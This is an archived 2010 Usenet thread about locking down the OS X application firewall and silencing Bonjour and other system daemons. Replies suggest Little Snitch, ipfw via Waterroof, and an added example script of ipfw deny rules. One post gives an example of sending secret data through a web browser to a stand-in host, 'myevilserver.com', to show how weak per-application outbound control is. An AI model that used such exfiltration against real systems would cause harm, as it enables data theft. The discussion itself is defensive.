From: Jim on 21 Jan 2010 08:40

On 2010-01-21, James Taylor <usenet(a)oakseed.demon.co.uk.invalid> wrote:
>
> Indeed. I'm off to get something to eat, then there's going to be some
> savage butchery to this file when I get back. Thank you so much.
>

I think it goes without saying that you should probably back it up first..:-)

Jim
--
http://www.ursaMinorBeta.co.uk
http://twitter.com/GreyAreaUK
"Get over here. Now. Might be advisable to wear brown trousers and a shirt the colour of blood." Malcolm Tucker, "The Thick of It"
From: Richard Tobin on 21 Jan 2010 08:57

In article <7rr1pcFojU1(a)mid.individual.net>, James Taylor <usenet(a)oakseed.demon.co.uk.invalid> wrote:

>> Why can netcat do things that the malware itself can't? Are you
>> suggesting that netcat would be an application trusted by the
>> firewall?

> Apparently, Apple have pre-signed many of the standard OS components to
> allow them access through the firewall without needing explicit rules in
> the firewall or asking for user permission.

Is netcat such a component? But see below about web browsers.

>> I would have thought it was too tedious to control outgoing
>> connections by application (rather than port).

> No, that's the whole point of an "application" firewall as opposed to a
> network level firewall.

I understand the distinction between application and network level firewalls. But for *outgoing* connections, controlling it at the application level seems too tedious: there are hundreds of commonly used programs that make outgoing connections, but just a few that accept incoming ones. And many of those programs can, by design, connect to anything. For example, any web browser could be used to send data to an arbitrary TCP port on an arbitrary server - just tell it to go to http://myevilserver.com:666/[lots-of-secret-data]

Are you considering a machine so locked down that it mustn't be able to run a web browser? If so, I would have thought a network-level firewall that only allowed connections to trusted hosts would be a better solution.

-- Richard
--
Please remember to mention me / in tapes you leave behind.
From: Gordon on 21 Jan 2010 09:17

On Jan 21, 8:59 am, James Taylor <use...(a)oakseed.demon.co.uk.invalid> wrote:
> Hi,
>
> I'm trying to find out how to get the OS X application firewall to block
> access to all incoming traffic except for one application, VMware.
> Unfortunately the OS X application firewall is essentially useless
> because it allows all manner of things to easily bypass it, either
> directly or by using a command line tool such as netcat. See:
> <http://www.h-online.com/security/news/item/Apple-documents-Leopard-fi...>
>
> I know Apple are pretty clueless about security, but leaving all root
> owned listening processes open even when the firewall is fully locked?
> That's crazy! Can anyone tell me how to get the application firewall to
> actually do its job and block incoming access to everything but VMware?
>
> Equally, I'd like to disable completely (or at least block the incoming
> and outgoing traffic of) system daemons such as configd, mDNSResponder,
> the Finder using nmblookup and smbclient, DirectoryService, ntpd, and
> there may be others. I want total "silence on the wire". If anyone knows
> how to disable any of those chatty daemons I'd be very very grateful to
> hear how (launchd maybe?).
>
> I've been tinkering with this on and off for months. I'm getting
> desperate now. I'm on the point of wiping VMware and even OS X off my
> brand new MacBook Pro and installing Linux with KVM just so I can get a
> properly secured VM hosting environment for my work.
>
> Anyone know anything about Mac networking here?
>
> --
> James Taylor

What about Little Snitch? Might that let you lock the system down enough for your tastes?
From: David Stone on 21 Jan 2010 09:34

In article <slrnhlg9bl.165.jim(a)wotan.magrathea.local>, Jim <jim(a)magrathea.plus.com> wrote:

> On 2010-01-21, James Taylor <usenet(a)oakseed.demon.co.uk.invalid> wrote:
> > Jim wrote:
> >
> >> This is probably a hopelessly simplistic answer, but could you not simply
> >> put the Mac's network adaptor on a 10.x.y.z network, then put the VM's
> >> adaptors onto the realworld network?
> >
> > Nice idea Jim, but sadly that doesn't stop OS X from Bonjouring everyone
> > on the network about your machine name, IP address, listening services,
> > etc, and thus it would be very easy for a malicious agent (virus,
> > hacker, whatever) on the same LAN segment to see you and then attack the
> > IP address you were on whatever you set it to.
>
> Bother.

I use Waterroof to configure ipfw to block all the Bonjour stuff:

http://www.hanynet.com/waterroof/

This has the added benefit of keeping the log files to a reasonable size!

If you use this application, don't forget to use the "Install Startup Script" option once you have the rules tweaked the way you want, or you'll have to manually reload them after each restart.

This is in addition to the appfirewall, which is currently set to "Allow only essential services".
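As an added illustration of the ipfw approach David describes (this is not Waterroof's own startup script, nor anything posted in the thread), the script below emits a small ipfw rule set that silences the chatty services James listed: Bonjour/mDNS, the Finder's NetBIOS and SMB lookups, and ntpd. The rule numbers and the TRUSTED_NETS value are assumptions chosen for the example; by default it only prints the rules, and `--apply` feeds them to ipfw as root on the Mac.

```shell
#!/bin/sh
# Added example: ipfw rules for "silence on the wire" on an OS X host.
# Rule numbers and TRUSTED_NETS are assumptions; adjust to your own setup.

# Constructed example: the network the VM host may still talk to.
TRUSTED_NETS="10.0.0.0/8"

emit_rules() {
    # Numbering leaves gaps so Waterroof or hand-written rules fit between.
    # Bonjour/mDNS: multicast announcements and replies on UDP 5353.
    echo "add 2000 deny log udp from any to 224.0.0.251 dst-port 5353"
    echo "add 2010 deny log udp from any 5353 to any dst-port 5353"
    # NetBIOS name/datagram service (what the Finder's nmblookup uses).
    echo "add 2100 deny log udp from any to any dst-port 137,138"
    # SMB/CIFS session traffic (smbclient) leaving this host.
    echo "add 2110 deny log tcp from me to any dst-port 139,445 out"
    # ntpd: stop outbound time queries.
    echo "add 2200 deny log udp from me to any dst-port 123 out"
    # After the noise filters, allow traffic to explicitly trusted networks.
    echo "add 2300 allow ip from me to $TRUSTED_NETS out"
}

# Number of rules emitted (handy as a sanity check before applying).
rule_count() {
    emit_rules | wc -l | tr -d ' '
}

# Rules that log denied packets, so the ipfw log shows what was silenced.
logging_rule_count() {
    emit_rules | grep -c 'deny log'
}

case "${1:-}" in
    --apply)
        # Requires root; ipfw -q keeps it quiet when run from a startup script.
        emit_rules | while read -r rule; do ipfw -q $rule; done
        ;;
    *)
        emit_rules
        ;;
esac
```

Save it with Waterroof's "Install Startup Script" (or your own launchd item) so the rules survive a reboot, as David notes.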
From: Woody on 21 Jan 2010 09:47

Jim <jim(a)magrathea.plus.com> wrote:
> On 2010-01-21, James Taylor <usenet(a)oakseed.demon.co.uk.invalid> wrote:
> >
> > Indeed. I'm off to get something to eat, then there's going to be some
> > savage butchery to this file when I get back. Thank you so much.
> >
>
> I think it goes without saying that you should probably back it up
> first..:-)

Pah - where is your sense of adventure?

--
Woody